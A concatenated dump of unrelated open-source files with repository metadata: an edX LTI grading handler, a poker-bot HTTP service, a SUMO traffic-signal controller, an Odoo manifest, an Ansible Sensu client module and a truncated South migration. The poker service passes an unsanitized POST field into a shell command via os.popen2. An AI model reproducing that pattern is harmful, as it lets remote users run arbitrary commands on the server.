<imsx_POXResponseHeaderInfo>
<imsx_version>V1.0</imsx_version>
<imsx_messageIdentifier>{imsx_messageIdentifier}</imsx_messageIdentifier>
<imsx_statusInfo>
<imsx_codeMajor>{imsx_codeMajor}</imsx_codeMajor>
<imsx_severity>status</imsx_severity>
<imsx_description>{imsx_description}</imsx_description>
<imsx_messageRefIdentifier>
</imsx_messageRefIdentifier>
</imsx_statusInfo>
</imsx_POXResponseHeaderInfo>
</imsx_POXHeader>
<imsx_POXBody>{response}</imsx_POXBody>
</imsx_POXEnvelopeResponse>
""")
# Returns when `action` is unsupported.
# Supported actions:
# - replaceResultRequest.
unsupported_values = {
'imsx_codeMajor': 'unsupported',
'imsx_description': 'Target does not support the requested operation.',
'imsx_messageIdentifier': 'unknown',
'response': ''
}
# Returns if:
# - past due grades are not accepted and grade is past due
# - score is out of range
# - can't parse response from TP;
# - can't verify OAuth signing or OAuth signing is incorrect.
failure_values = {
'imsx_codeMajor': 'failure',
'imsx_description': 'The request has failed.',
'imsx_messageIdentifier': 'unknown',
'response': ''
}
if not self.accept_grades_past_due and self.is_past_due():
failure_values['imsx_description'] = "Grade is past due"
return Response(response_xml_template.format(**failure_values), content_type="application/xml")
try:
imsx_messageIdentifier, sourcedId, score, action = self.parse_grade_xml_body(request.body)
except Exception as e:
error_message = "Request body XML parsing error: " + escape(text_type(e))
log.debug("[LTI]: " + error_message)
failure_values['imsx_description'] = error_message
return Response(response_xml_template.format(**failure_values), content_type="application/xml")
# Verify OAuth signing.
try:
self.verify_oauth_body_sign(request)
except (ValueError, LTIError) as e:
failure_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier)
error_message = "OAuth verification error: " + escape(text_type(e))
failure_values['imsx_description'] = error_message
log.debug("[LTI]: " + error_message)
return Response(response_xml_template.format(**failure_values), content_type="application/xml")
real_user = self.system.get_real_user(six.moves.urllib.parse.unquote(sourcedId.split(':')[-1]))
if not real_user: # that means we can't save to database, as we do not have real user id.
failure_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier)
failure_values['imsx_description'] = "User not found."
return Response(response_xml_template.format(**failure_values), content_type="application/xml")
if action == 'replaceResultRequest':
self.set_user_module_score(real_user, score, self.max_score())
values = {
'imsx_codeMajor': 'success',
'imsx_description': 'Score for {sourced_id} is now {score}'.format(sourced_id=sourcedId, score=score),
'imsx_messageIdentifier': escape(imsx_messageIdentifier),
'response': '<replaceResultResponse/>'
}
log.debug("[LTI]: Grade is saved.")
return Response(response_xml_template.format(**values), content_type="application/xml")
unsupported_values['imsx_messageIdentifier'] = escape(imsx_messageIdentifier)
log.debug("[LTI]: Incorrect action.")
return Response(response_xml_template.format(**unsupported_values), content_type='application/xml')
@classmethod
def parse_grade_xml_body(cls, body):
"""
Parses XML from request.body and returns parsed data
XML body should contain nsmap with namespace, that is specified in LTI specs.
Returns tuple: imsx_messageIdentifier, sourcedId, score, action
Raises Exception if can't parse.
"""
lti_spec_namespace = "http://www.imsglobal.org/services/ltiv1p1/xsd/imsoms_v1p0"
namespaces = {'def': lti_spec_namespace}
data = body.strip().encode('utf-8')
parser = etree.XMLParser(ns_clean=True, recover=True, encoding='utf-8')
root = etree.fromstring(data, parser=parser)
imsx_messageIdentifier = root.xpath("//def:imsx_messageIdentifier", namespaces=namespaces)[0].text or ''
sourcedId = root.xpath("//def:sourcedId", namespaces=namespaces)[0].text
score = root.xpath("//def:textString", namespaces=namespaces)[0].text
action = root.xpath("//def:imsx_POXBody", namespaces=namespaces)[0].getchildren()[0].tag.replace('{' + lti_spec_namespace + '}', '')
        # Raise an exception if the score is not a float or lies outside the
        # 0.0-1.0 range required by the spec.
score = float(score)
if not 0 <= score <= 1:
raise LTIError('score value outside the permitted range of 0-1.')
return imsx_messageIdentifier, sourcedId, score, action
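    # A worked example against the request template shown in the grade_handler
    # docstring above: that body parses to the header's message identifier,
    # the sourcedId from the sourcedGUID block, score 0.4 (the <textString>
    # value cast to float), and action 'replaceResultRequest' (the tag of the
    # first imsx_POXBody child).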
def verify_oauth_body_sign(self, request, content_type='application/x-www-form-urlencoded'):
"""
Verify grade request from LTI provider using OAuth body signing.
Uses http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html::
This specification extends the OAuth signature to include integrity checks on HTTP request bodies
with content types other than application/x-www-form-urlencoded.
Arguments:
request: DjangoWebobRequest.
Raises:
LTIError if request is incorrect.
"""
client_key, client_secret = self.get_client_key_secret()
headers = {
'Authorization': six.text_type(request.headers.get('Authorization')),
'Content-Type': content_type,
}
sha1 = hashlib.sha1()
sha1.update(request.body)
oauth_body_hash = base64.b64encode(sha1.digest())
oauth_params = signature.collect_parameters(headers=headers, exclude_oauth_signature=False)
oauth_headers = dict(oauth_params)
oauth_signature = oauth_headers.pop('oauth_signature')
mock_request_lti_1 = mock.Mock(
uri=six.text_type(six.moves.urllib.parse.unquote(self.get_outcome_service_url())),
http_method=six.text_type(request.method),
params=list(oauth_headers.items()),
signature=oauth_signature
)
mock_request_lti_2 = mock.Mock(
uri=six.text_type(six.moves.urllib.parse.unquote(request.url)),
http_method=six.text_type(request.method),
params=list(oauth_headers.items()),
signature=oauth_signature
)
if oauth_body_hash != oauth_headers.get('oauth_body_hash'):
log.error(
"OAuth body hash verification failed, provided: {}, "
"calculated: {}, for url: {}, body is: {}".format(
oauth_headers.get('oauth_body_hash'),
oauth_body_hash,
self.get_outcome_service_url(),
request.body
)
)
raise LTIError("OAuth body hash verification is failed.")
if (not signature.verify_hmac_sha1(mock_request_lti_1, client_secret) and not
signature.verify_hmac_sha1(mock_request_lti_2, client_secret)):
log.error("OAuth signature verification failed, for "
"headers:{} url:{} method:{}".format(
oauth_headers,
self.get_outcome_service_url(),
six.text_type(request.method)
))
raise LTIError("OAuth signature verification has failed.")
def get_client_key_secret(self):
"""
Obtains client_key and client_secret credentials from current course.
"""
course = self.get_course()
for lti_passport in course.lti_passports:
try:
lti_id, key, secret = [i.strip() for i in lti_passport.split(':')]
except ValueError:
_ = self.runtime.service(self, "i18n").ugettext
msg = _('Could not parse LTI passport: {lti_passport}. Should be "id:key:secret" string.').format(
lti_passport='{0!r}'.format(lti_passport)
)
raise LTIError(msg)
if lti_id == self.lti_id.strip():
return key, secret
return '', ''
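    # Example: with the (hypothetical) passport "my_lti_tool:client_key:client_secret"
    # in course.lti_passports and self.lti_id == "my_lti_tool", this returns
    # ('client_key', 'client_secret'); an unknown lti_id yields ('', '').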
def is_past_due(self):
"""
Is it now past this problem's due date, including grace period?
"""
due_date = self.due # pylint: disable=no-member
if self.graceperiod is not None and due_date: # pylint: disable=no-member
close_date = due_date + self.graceperiod # pylint: disable=no-member
else:
close_date = due_date
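        # e.g. (hypothetical values): due = 2017-01-01 00:00 UTC with a one-day
        # graceperiod gives close_date = 2017-01-02 00:00 UTC; the grade is
        # rejected only after that instant.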
return close_date is not None and datetime.datetime.now(UTC) > close_date
class LTIDescriptor(LTIFields, MetadataOnlyEditingDescriptor, EmptyDataRawDescriptor):
"""
Descriptor for LTI Xmodule.
"""
def max_score(self):
return self.weight if self.has_score else None
module_class = LTIModule
resources_dir = None
grade_handler = module_attr('grade_handler')
preview_handler = module_attr('preview_handler')
lti_2_0_result_rest_handler = module_attr('lti_2_0_result_rest_handler')
clear_user_module_score = module_attr('clear_user_module_score')
get_outcome_service_url = module_attr('get_outcome_service_url')
|
jolyonb/edx-platform
|
common/lib/xmodule/xmodule/lti_module.py
|
Python
|
agpl-3.0
| 37,872 | 0.002905 |
import time
import cgi
import json
import os
import BaseHTTPServer
HOST_NAME = 'localhost'
PORT_NUMBER = 9400
class PlayerService(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
postvars = cgi.parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers.getheader('content-length'))
postvars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
postvars = {}
action = postvars['action'][0]
w, r = os.popen2("./obj/player " + action)
if 'game_state' in postvars:
game_state = postvars['game_state'][0]
w.write(game_state)
w.close()
response = r.read()
self.wfile.write(response)
if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), PlayerService)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
|
rolandkakonyi/poker-player-objc
|
player_service.py
|
Python
|
mit
| 1,447 | 0.002073 |
#!/usr/bin/env python
"""
@file HybridVAControl.py
@author Craig Rafter
@date 19/08/2016
class for hybrid vehicle-actuated (VA) signal control
"""
import signalControl, readJunctionData, traci
from math import atan2, degrees, hypot
import numpy as np
from collections import defaultdict
class HybridVAControl(signalControl.signalControl):
def __init__(self, junctionData, minGreenTime=10., maxGreenTime=60., scanRange=250, packetRate=0.2):
super(HybridVAControl, self).__init__()
self.junctionData = junctionData
self.firstCalled = traci.simulation.getCurrentTime()
self.lastCalled = self.firstCalled
self.lastStageIndex = 0
traci.trafficlights.setRedYellowGreenState(self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString)
self.packetRate = int(1000*packetRate)
self.transition = False
# self.CAMactive = False
# dict[vehID] = [position, heading, velocity, Tdetect]
self.newVehicleInfo = {}
self.oldVehicleInfo = {}
self.scanRange = scanRange
self.jcnPosition = np.array(traci.junction.getPosition(self.junctionData.id))
self.jcnCtrlRegion = self._getJncCtrlRegion()
# print(self.junctionData.id)
# print(self.jcnCtrlRegion)
self.controlledLanes = traci.trafficlights.getControlledLanes(self.junctionData.id)
# dict[laneID] = [heading, shape]
self.laneDetectionInfo = self._getIncomingLaneInfo()
self.stageTime = 0.0
self.minGreenTime = minGreenTime
self.maxGreenTime = maxGreenTime
self.secondsPerMeterTraffic = 0.45
self.nearVehicleCatchDistance = 25
self.extendTime = 1.0 # 5 m in 10 m/s (acceptable journey 1.333)
self.laneInductors = self._getLaneInductors()
self.TIME_MS = self.firstCalled
self.TIME_SEC = 0.001 * self.TIME_MS
'''def minmax(x, lower, upper):
return min(max(x, lower), upper)
'''
def process(self):
self.TIME_MS = traci.simulation.getCurrentTime()
self.TIME_SEC = 0.001 * self.TIME_MS
# Packets sent on this step
# packet delay + only get packets towards the end of the second
if (not self.TIME_MS % self.packetRate) and (not 50 < self.TIME_MS % 1000 < 650):
#self.CAMactive = True
self._getCAMinfo()
# else:
# self.CAMactive = False
# Update stage decisions
# If there's no ITS enabled vehicles present use VA ctrl
numCAVs = len(self.oldVehicleInfo)
isControlInterval = not self.TIME_MS % 1000
#if isControlInterval: print('CTRL')
if numCAVs < 1 and isControlInterval:
detectTimePerLane = self._getLaneDetectTime()
# Set adaptive time limit
if np.any(detectTimePerLane < 2):
extend = self.extendTime
else:
extend = 0.0
self.stageTime = max(self.stageTime + extend, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('A'+str(self.stageTime))
        # If CAVs are active and we're on the second, or in transition, make the stage decision
elif numCAVs >= 1 and isControlInterval:
oncomingVeh = self._getOncomingVehicles()
            # On a new stage, find the furthest vehicle from the stop line whose
            # velocity is < 5% of the speed limit, to estimate the queue length
if self.transition:
furthestVeh = self._getFurthestStationaryVehicle(oncomingVeh)
if furthestVeh[0] != '':
meteredTime = self.secondsPerMeterTraffic*furthestVeh[1]
self.stageTime = max(self.minGreenTime, meteredTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
# If we're in this state this should never happen but just in case
else:
self.stageTime = self.minGreenTime
#print('B'+str(self.stageTime))
# If currently staging then extend time if there are vehicles close
# to the stop line
else:
nearestVeh = self._getNearestVehicle(oncomingVeh)
# If a vehicle detected
if nearestVeh != '' and nearestVeh[1] <= self.nearVehicleCatchDistance:
if (self.oldVehicleInfo[nearestVeh[0]][2] != 1e6
and self.oldVehicleInfo[nearestVeh[0]][2] > 1.0/self.secondsPerMeterTraffic):
meteredTime = nearestVeh[1]/self.oldVehicleInfo[nearestVeh[0]][2]
else:
meteredTime = self.secondsPerMeterTraffic*nearestVeh[1]
elapsedTime = 0.001*(self.TIME_MS - self.lastCalled)
Tremaining = self.stageTime - elapsedTime
self.stageTime = elapsedTime + max(meteredTime, Tremaining)
#self.stageTime = max(self.stageTime, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('C'+str(self.stageTime))
                # No detectable nearby vehicle; fall back to inductive loop info
elif nearestVeh == '' or nearestVeh[1] > self.nearVehicleCatchDistance:
detectTimePerLane = self._getLaneDetectTime()
# Set adaptive time limit
if np.any(detectTimePerLane < 2):
extend = self.extendTime
else:
extend = 0.0
self.stageTime = max(self.stageTime + extend, self.minGreenTime)
self.stageTime = min(self.stageTime, self.maxGreenTime)
#print('D'+str(self.stageTime))
else:
pass
# process stage as normal
else:
pass
# print(self.stageTime)
if isControlInterval:
self.transition = False
if self.transitionObject.active:
# If the transition object is active i.e. processing a transition
pass
# elif (self.TIME_MS - self.firstCalled) < (self.junctionData.offset*1000):
# # Process offset first
# pass
elif (self.TIME_MS - self.lastCalled) < self.stageTime*1000:
                # Still within the current stage's allotted time
                pass
            else:
                # No transition active and the stage time has elapsed
if len(self.junctionData.stages) != (self.lastStageIndex)+1:
                    # Proceed to the next stage
self.transitionObject.newTransition(
self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString,
self.junctionData.stages[self.lastStageIndex+1].controlString)
self.lastStageIndex += 1
else:
                    # Loop from the final stage back to the first stage
self.transitionObject.newTransition(
self.junctionData.id,
self.junctionData.stages[self.lastStageIndex].controlString,
self.junctionData.stages[0].controlString)
self.lastStageIndex = 0
#print(self.stageTime)
self.lastCalled = self.TIME_MS
self.transition = True
self.stageTime = 0.0
super(HybridVAControl, self).process()
def _getHeading(self, currentLoc, prevLoc):
dy = currentLoc[1] - prevLoc[1]
dx = currentLoc[0] - prevLoc[0]
if currentLoc[1] == prevLoc[1] and currentLoc[0] == prevLoc[0]:
heading = -1
else:
if dy >= 0:
heading = degrees(atan2(dy, dx))
else:
heading = 360 + degrees(atan2(dy, dx))
# Map angle to make compatible with SUMO heading
if 0 <= heading <= 90:
heading = 90 - heading
elif 90 < heading < 360:
heading = 450 - heading
return heading
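    # Worked examples of the mapping: due east (dx=1, dy=0) is a mathematical
    # heading of 0 degrees, mapped to SUMO heading 90; due north (dx=0, dy=1)
    # is 90 degrees, mapped to SUMO heading 0 (SUMO measures clockwise from
    # north).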
def _getJncCtrlRegion(self):
jncPosition = traci.junction.getPosition(self.junctionData.id)
otherJuncPos = [traci.junction.getPosition(x) for x in traci.trafficlights.getIDList() if x != self.junctionData.id]
ctrlRegion = {'N':jncPosition[1]+self.scanRange, 'S':jncPosition[1]-self.scanRange,
'E':jncPosition[0]+self.scanRange, 'W':jncPosition[0]-self.scanRange}
TOL = 10 # Exclusion region around junction boundary
if otherJuncPos != []:
for pos in otherJuncPos:
dx = jncPosition[0] - pos[0]
dy = jncPosition[1] - pos[1]
# North/South Boundary
if abs(dy) < self.scanRange:
if dy < -TOL:
ctrlRegion['N'] = min(pos[1] - TOL, ctrlRegion['N'])
elif dy > TOL:
ctrlRegion['S'] = max(pos[1] + TOL, ctrlRegion['S'])
else:
pass
else:
pass
# East/West Boundary
if abs(dx) < self.scanRange:
if dx < -TOL:
ctrlRegion['E'] = min(pos[0] - TOL, ctrlRegion['E'])
elif dx > TOL:
ctrlRegion['W'] = max(pos[0] + TOL, ctrlRegion['W'])
else:
pass
else:
pass
return ctrlRegion
def _isInRange(self, vehPosition):
distance = np.linalg.norm(vehPosition - self.jcnPosition)
if (distance < self.scanRange
and self.jcnCtrlRegion['W'] <= vehPosition[0] <= self.jcnCtrlRegion['E']
and self.jcnCtrlRegion['S'] <= vehPosition[1] <= self.jcnCtrlRegion['N']):
return True
else:
return False
def _getVelocity(self, vehID, vehPosition, Tdetect):
if vehID in self.oldVehicleInfo.keys():
oldX = np.array(self.oldVehicleInfo[vehID][0])
newX = np.array(vehPosition)
dx = np.linalg.norm(newX - oldX)
dt = Tdetect - self.oldVehicleInfo[vehID][3]
velocity = dx/dt
return velocity
else:
return 1e6
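    # Speed is estimated from two successive CAM positions as dx/dt; the
    # sentinel 1e6 marks a vehicle seen for the first time, whose velocity is
    # not yet known (process() tests against this value explicitly).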
def _getCAMinfo(self):
self.oldVehicleInfo = self.newVehicleInfo.copy()
self.newVehicleInfo = {}
Tdetect = self.TIME_SEC
for vehID in traci.vehicle.getIDList():
vehPosition = traci.vehicle.getPosition(vehID)
if traci.vehicle.getTypeID(vehID) == 'typeITSCV' and self._isInRange(vehPosition):
vehHeading = traci.vehicle.getAngle(vehID)
vehVelocity = self._getVelocity(vehID, vehPosition, Tdetect)
self.newVehicleInfo[vehID] = [vehPosition, vehHeading, vehVelocity, Tdetect]
def _getIncomingLaneInfo(self):
laneInfo = defaultdict(list)
for lane in list(np.unique(np.array(self.controlledLanes))):
shape = traci.lane.getShape(lane)
width = traci.lane.getWidth(lane)
heading = self._getHeading(shape[1], shape[0])
dx = shape[0][0] - shape[1][0]
dy = shape[0][1] - shape[1][1]
if abs(dx) > abs(dy):
roadBounds = ((shape[0][0], shape[0][1] + width), (shape[1][0], shape[1][1] - width))
else:
roadBounds = ((shape[0][0] + width, shape[0][1]), (shape[1][0] - width, shape[1][1]))
laneInfo[lane] = [heading, roadBounds]
return laneInfo
def _getOncomingVehicles(self):
# Oncoming if (in active lane & heading matches oncoming heading &
# is in lane bounds)
activeLanes = self._getActiveLanes()
vehicles = []
for lane in activeLanes:
for vehID in self.oldVehicleInfo.keys():
                # If on the correct heading, within ±10 degrees
if (np.isclose(self.oldVehicleInfo[vehID][1], self.laneDetectionInfo[lane][0], atol=10)
# If in lane x bounds
and min(self.laneDetectionInfo[lane][1][0][0], self.laneDetectionInfo[lane][1][1][0]) <
self.oldVehicleInfo[vehID][0][0] <
max(self.laneDetectionInfo[lane][1][0][0], self.laneDetectionInfo[lane][1][1][0])
# If in lane y bounds
and min(self.laneDetectionInfo[lane][1][0][1], self.laneDetectionInfo[lane][1][1][1]) <
self.oldVehicleInfo[vehID][0][1] <
max(self.laneDetectionInfo[lane][1][0][1], self.laneDetectionInfo[lane][1][1][1])):
# Then append vehicle
vehicles.append(vehID)
vehicles = list(np.unique(np.array(vehicles)))
return vehicles
def _getActiveLanes(self):
# Get the current control string to find the green lights
stageCtrlString = self.junctionData.stages[self.lastStageIndex].controlString
activeLanes = []
for i, letter in enumerate(stageCtrlString):
if letter == 'G':
activeLanes.append(self.controlledLanes[i])
# Get a list of the unique active lanes
activeLanes = list(np.unique(np.array(activeLanes)))
return activeLanes
def _getLaneInductors(self):
laneInductors = defaultdict(list)
for loop in traci.inductionloop.getIDList():
loopLane = traci.inductionloop.getLaneID(loop)
if loopLane in self.controlledLanes:
laneInductors[loopLane].append(loop)
return laneInductors
def _getFurthestStationaryVehicle(self, vehIDs):
furthestID = ''
maxDistance = -1
speedLimit = traci.lane.getMaxSpeed(self._getActiveLanes()[0])
for ID in vehIDs:
vehPosition = np.array(self.oldVehicleInfo[ID][0])
distance = np.linalg.norm(vehPosition - self.jcnPosition)
if distance > maxDistance and self.oldVehicleInfo[ID][2] < 0.05*speedLimit:
furthestID = ID
maxDistance = distance
return [furthestID, maxDistance]
def _getNearestVehicle(self, vehIDs):
nearestID = ''
minDistance = self.nearVehicleCatchDistance + 1
for ID in vehIDs:
vehPosition = np.array(self.oldVehicleInfo[ID][0])
distance = np.linalg.norm(vehPosition - self.jcnPosition)
if distance < minDistance:
nearestID = ID
minDistance = distance
return [nearestID, minDistance]
def _getLaneDetectTime(self):
activeLanes = self._getActiveLanes()
meanDetectTimePerLane = np.zeros(len(activeLanes))
for i, lane in enumerate(activeLanes):
detectTimes = []
for loop in self.laneInductors[lane]:
detectTimes.append(traci.inductionloop.getTimeSinceDetection(loop))
meanDetectTimePerLane[i] = np.mean(detectTimes)
return meanDetectTimePerLane
|
cbrafter/TRB18_GPSVA
|
codes/sumoAPI/HybridVAControl.py
|
Python
|
mit
| 15,253 | 0.005704 |
# -*- coding: utf-8 -*-
# (c) 2016 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
{
"name": "Partner Contact Birthdate Age",
'version': '8.0.1.1.0',
'license': "AGPL-3",
'author': "AvanzOSC",
'website': "http://www.avanzosc.es",
'contributors': [
"Ana Juaristi <anajuaristi@avanzosc.es>",
"Alfredo de la Fuente <alfredodelafuente@avanzosc.es",
],
"category": "Customer Relationship Management",
"depends": [
'partner_contact_birthdate',
],
"data": [
'views/res_partner_view.xml',
],
"installable": True,
}
|
alfredoavanzosc/odoo-addons
|
partner_contact_birthdate_age/__openerp__.py
|
Python
|
agpl-3.0
| 640 | 0 |
#!/usr/bin/python
# (c) 2017, Red Hat Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: sensu_client
author: "David Moreau Simard (@dmsimard)"
short_description: Manages Sensu client configuration
version_added: 2.4
description:
- Manages Sensu client configuration.
- 'For more information, refer to the Sensu documentation: U(https://sensuapp.org/docs/latest/reference/clients.html)'
options:
state:
description:
- Whether the client should be present or not
choices: [ 'present', 'absent' ]
required: False
default: present
name:
description:
- A unique name for the client. The name cannot contain special characters or spaces.
required: False
default: System hostname as determined by Ruby Socket.gethostname (provided by Sensu)
address:
description:
- An address to help identify and reach the client. This is only informational, usually an IP address or hostname.
required: False
default: Non-loopback IPv4 address as determined by Ruby Socket.ip_address_list (provided by Sensu)
subscriptions:
description:
- An array of client subscriptions, a list of roles and/or responsibilities assigned to the system (e.g. webserver).
- These subscriptions determine which monitoring checks are executed by the client, as check requests are sent to subscriptions.
- The subscriptions array items must be strings.
required: True
default: null
safe_mode:
description:
- If safe mode is enabled for the client. Safe mode requires local check definitions in order to accept a check request and execute the check.
choices: [ 'true', 'false' ]
required: False
default: false
redact:
description:
- Client definition attributes to redact (values) when logging and sending client keepalives.
required: False
default: null
socket:
description:
- The socket definition scope, used to configure the Sensu client socket.
required: False
default: null
keepalives:
description:
- If Sensu should monitor keepalives for this client.
choices: [ 'true', 'false' ]
required: False
default: true
keepalive:
description:
- The keepalive definition scope, used to configure Sensu client keepalives behavior (e.g. keepalive thresholds, etc).
required: False
default: null
registration:
description:
- The registration definition scope, used to configure Sensu registration event handlers.
required: False
default: null
deregister:
description:
- If a deregistration event should be created upon Sensu client process stop.
choices: [ 'true', 'false' ]
required: False
default: false
deregistration:
description:
- The deregistration definition scope, used to configure automated Sensu client de-registration.
required: False
default: null
ec2:
description:
- The ec2 definition scope, used to configure the Sensu Enterprise AWS EC2 integration (Sensu Enterprise users only).
required: False
default: null
chef:
description:
- The chef definition scope, used to configure the Sensu Enterprise Chef integration (Sensu Enterprise users only).
required: False
default: null
puppet:
description:
- The puppet definition scope, used to configure the Sensu Enterprise Puppet integration (Sensu Enterprise users only).
required: False
default: null
servicenow:
description:
- The servicenow definition scope, used to configure the Sensu Enterprise ServiceNow integration (Sensu Enterprise users only).
required: False
default: null
notes:
- Check mode is supported
requirements: [ ]
'''
EXAMPLES = '''
# Minimum possible configuration
- name: Configure Sensu client
sensu_client:
subscriptions:
- default
# With customization
- name: Configure Sensu client
sensu_client:
name: "{{ ansible_fqdn }}"
address: "{{ ansible_default_ipv4['address'] }}"
subscriptions:
- default
- webserver
redact:
- password
socket:
bind: 127.0.0.1
port: 3030
keepalive:
thresholds:
warning: 180
critical: 300
handlers:
- email
custom:
- broadcast: irc
occurrences: 3
register: client
notify:
- Restart sensu-client
- name: Secure Sensu client configuration file
file:
path: "{{ client['file'] }}"
owner: "sensu"
group: "sensu"
mode: "0600"
- name: Delete the Sensu client configuration
sensu_client:
state: "absent"
'''
RETURN = '''
config:
description: Effective client configuration, when state is present
returned: success
type: dict
sample: {'name': 'client', 'subscriptions': ['default']}
file:
description: Path to the client configuration file
returned: success
type: string
sample: "/etc/sensu/conf.d/client.json"
'''
import json
import os
from ansible.module_utils.basic import AnsibleModule
def main():
module = AnsibleModule(
supports_check_mode=True,
argument_spec=dict(
state=dict(type='str', required=False, choices=['present', 'absent'], default='present'),
name=dict(type='str', required=False),
address=dict(type='str', required=False),
subscriptions=dict(type='list', required=False),
safe_mode=dict(type='bool', required=False, default=False),
redact=dict(type='list', required=False),
socket=dict(type='dict', required=False),
keepalives=dict(type='bool', required=False, default=True),
keepalive=dict(type='dict', required=False),
registration=dict(type='dict', required=False),
deregister=dict(type='bool', required=False),
deregistration=dict(type='dict', required=False),
ec2=dict(type='dict', required=False),
chef=dict(type='dict', required=False),
puppet=dict(type='dict', required=False),
servicenow=dict(type='dict', required=False)
),
required_if=[
['state', 'present', ['subscriptions']]
]
)
state = module.params['state']
path = "/etc/sensu/conf.d/client.json"
if state == 'absent':
if os.path.exists(path):
if module.check_mode:
msg = '{path} would have been deleted'.format(path=path)
module.exit_json(msg=msg, changed=True)
else:
try:
os.remove(path)
msg = '{path} deleted successfully'.format(path=path)
module.exit_json(msg=msg, changed=True)
except OSError as e:
msg = 'Exception when trying to delete {path}: {exception}'
module.fail_json(
msg=msg.format(path=path, exception=str(e)))
else:
# Idempotency: it's okay if the file doesn't exist
msg = '{path} already does not exist'.format(path=path)
module.exit_json(msg=msg)
# Build client configuration from module arguments
config = {'client': {}}
args = ['name', 'address', 'subscriptions', 'safe_mode', 'redact',
'socket', 'keepalives', 'keepalive', 'registration', 'deregister',
'deregistration', 'ec2', 'chef', 'puppet', 'servicenow']
for arg in args:
if arg in module.params and module.params[arg] is not None:
config['client'][arg] = module.params[arg]
# Load the current config, if there is one, so we can compare
current_config = None
try:
current_config = json.load(open(path, 'r'))
except (IOError, ValueError):
# File either doesn't exist or it's invalid JSON
pass
if current_config is not None and current_config == config:
# Config is the same, let's not change anything
module.exit_json(msg='Client configuration is already up to date',
config=config['client'],
file=path)
# Validate that directory exists before trying to write to it
if not module.check_mode and not os.path.exists(os.path.dirname(path)):
try:
os.makedirs(os.path.dirname(path))
except OSError as e:
module.fail_json(msg='Unable to create {0}: {1}'.format(os.path.dirname(path),
str(e)))
if module.check_mode:
module.exit_json(msg='Client configuration would have been updated',
changed=True,
config=config['client'],
file=path)
try:
with open(path, 'w') as client:
client.write(json.dumps(config, indent=4))
module.exit_json(msg='Client configuration updated',
changed=True,
config=config['client'],
file=path)
except (OSError, IOError) as e:
module.fail_json(msg='Unable to write file {0}: {1}'.format(path,
str(e)))
if __name__ == '__main__':
main()
|
jbenden/ansible
|
lib/ansible/modules/monitoring/sensu_client.py
|
Python
|
gpl-3.0
| 9,506 | 0.002525 |
import subprocess
subprocess.call("""
adb -d shell am start -n com.android.gallery/com.android.camera.GalleryPicker
""")
|
carabri/carabri
|
test_script/open_gallery.py
|
Python
|
apache-2.0
| 123 | 0 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Page'
db.create_table('wiki_page', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('parent', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='children', null=True, to=orm['wiki.Page'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
('permission', self.gf('django.db.models.fields.IntegerField')(default=0)),
))
db.send_create_signal('wiki', ['Page'])
# Adding model 'Revision'
db.create_table('wiki_revision', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['wiki.Page'])),
('text', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['wiki.Text'], null=True, blank=True)),
('comment', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('pub_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('author', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('author_ip', self.gf('django.db.models.fields.IPAddressField')(max_length=15, null=True, blank=True)),
))
db.send_create_signal('wiki', ['Revision'])
# Adding model 'Text'
db.create_table('wiki_text', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal('wiki', ['Text'])
def backwards(self, orm):
# Deleting model 'Page'
db.delete_table('wiki_page')
# Deleting model 'Revision'
db.delete_table('wiki_revision')
# Deleting model 'Text'
db.delete_table('wiki_text')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
